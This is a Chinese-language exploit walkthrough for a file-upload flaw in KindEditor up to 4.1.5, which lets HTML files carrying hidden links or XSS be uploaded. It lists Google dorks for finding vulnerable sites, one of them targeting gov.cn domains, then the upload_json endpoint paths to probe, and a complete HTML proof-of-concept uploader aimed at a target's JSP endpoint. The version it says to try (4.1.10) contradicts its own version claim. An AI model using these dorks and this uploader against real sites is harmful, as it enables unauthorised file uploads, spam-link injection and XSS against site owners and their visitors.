kindeditor=4.1.5上传漏洞复现

article/2025/9/16 14:01:16

0x00 漏洞描述

漏洞存在于kindeditor编辑器里，你能上传.txt和.html文件，支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.5编辑器中

这里html里面可以嵌套暗链接地址以及嵌套xss。Kindeditor上的uploadbutton.html用于文件上传功能页面，直接POST到/upload_json.*?dir=file，在允许上传的文件扩展名中包含htm,txt：extTable.Add("file","doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2")

0x01 批量搜索

在google中批量搜索：

inurl:/examples/uploadbutton.htmlinurl:/php/upload_json.phpinurl:/asp.net/upload_json.ashxinurl://jsp/upload_json.jsp

inurl://asp/upload_json.asp

inurl:gov.cn/kindeditor/

0x02 漏洞问题

根本脚本语言自定义不同的上传地址，上传之前有必要验证文件 upload_json.* 的存在

/asp/upload_json.asp/asp.net/upload_json.ashx/jsp/upload_json.jsp/php/upload_json.php

可目录变量查看是否存在那种脚本上传漏洞:

kindeditor/asp/upload_json.asp?dir=filekindeditor/asp.net/upload_json.ashx?dir=filekindeditor/jsp/upload_json.jsp?dir=filekindeditor/php/upload_json.php?dir=file

0x03 漏洞利用

google搜素一些存在的站点 inurl：kindeditor

1.查看版本信息

http://www.xxx.org/kindeditor//kindeditor.js

2.版本是4.1.10可以进行尝试如下路径是否存在有必要验证文件 upload_json.*

kindeditor/asp/upload_json.asp?dir=filekindeditor/asp.net/upload_json.ashx?dir=filekindeditor/jsp/upload_json.jsp?dir=filekindeditor/php/upload_json.php?dir=file

3.如下图可以看出是存在jsp上传点:

http://www.xxx.org/kindeditor/jsp/upload_json.jsp?dir=file

4.写出下面的构造上传poc,这里需要修改<script>...<script>以及url : 的内容,根据实际情况修改.

<html><head><title>Uploader</title><script src="http://www.xxx.org/kindeditor//kindeditor.js"></script><script>KindEditor.ready(function(K) {var uploadbutton = K.uploadbutton({button : K('#uploadButton')[0],fieldName : 'imgFile',url : 'http://www.xxx.org/kindeditor/jsp/upload_json.jsp?dir=file',afterUpload : function(data) {if (data.error === 0) {var url = K.formatUrl(data.url, 'absolute');K('#url').val(url);}},});uploadbutton.fileBox.change(function(e) {uploadbutton.submit();});});</script></head><body><div class="upload"><input class="ke-input-text" type="text" id="url" value="" readonly="readonly" /><input type="button" id="uploadButton" value="Upload" /></div></body></html>